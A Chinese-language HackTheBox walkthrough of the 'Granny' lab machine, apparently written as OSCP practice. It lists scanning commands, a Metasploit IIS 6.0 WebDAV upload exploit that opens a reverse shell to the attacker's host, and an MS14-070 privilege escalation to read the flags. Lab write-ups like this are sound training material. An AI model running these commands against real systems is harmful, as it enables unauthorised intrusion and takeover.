靶机信息
靶机地址:
https://app.hackthebox.com/machines/Granny
靶场: HackTheBox.com
靶机名称:Granny
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Kali 10.10.16.3
靶机:10.10.10.15
信息收集
扫描端口(Scanner)
扫描靶机开放的服务端口
sudo masscan -p1-65535 -e tun0 10.10.10.15 --max-rate 1000
sudo nmap -sC -sV -p 80 10.10.10.15 -oN nmap.log
从扫描结果中看到80端口在IIS6.0下,并且开启了webdav功能,IIS6+webdav=RCE(远程代码执行)漏洞,上msf
Web渗透(Exploitation)
msfconsoel
search webdav
这两个exp都可以,使用iis_webdav_upload_asp这个exp来攻击
use 15
show options
选择exp后msf提示需要配置一个监听,默认的监听就够可以了,这里不需要单独设置,另外还需要设置目标地址(靶机IP)和本地地址(攻击机IP),配置好即可开始攻击。
set RHOSTS 10.10.10.15
set LHOST 10.10.16.3
run
成功拿到shell,但是执行getuid提示没有权限,进入shell查看
shell
whoami
拿到的是network service权限,先来找找flag
cd "Documents and Settings"
dir
cd lakis
cd administrator
两个用户文件夹都提示没有权限,只能先提权再拿flag
提权(Privilege Escalation)
使用local_exploit_suggester模块自动检查可利用的漏洞
search local_exploit_suggester
use 0
show options
set session 1
run
失败了,手动来测试
search 2003 privilege
用ms14_070_tcpip_ioctl这个模块来试试
use 12
show options
set session 1
set LHOST 10.10.16.3
run
又失败了,来找找原因
迁移后门到一个稳定的进程中
session 1
ps
migrate 1964
迁移成功,再来试试ms14-070提权
background
run
提权成功(以后要注意了一步都不能漏),来找下flag。
cd c:
cd "Documents and Settings"
dir
type LakisDesktopuser.txt
type administratorDesktoproot.txt
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.126 HTB:Granny(OSCP Prep)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论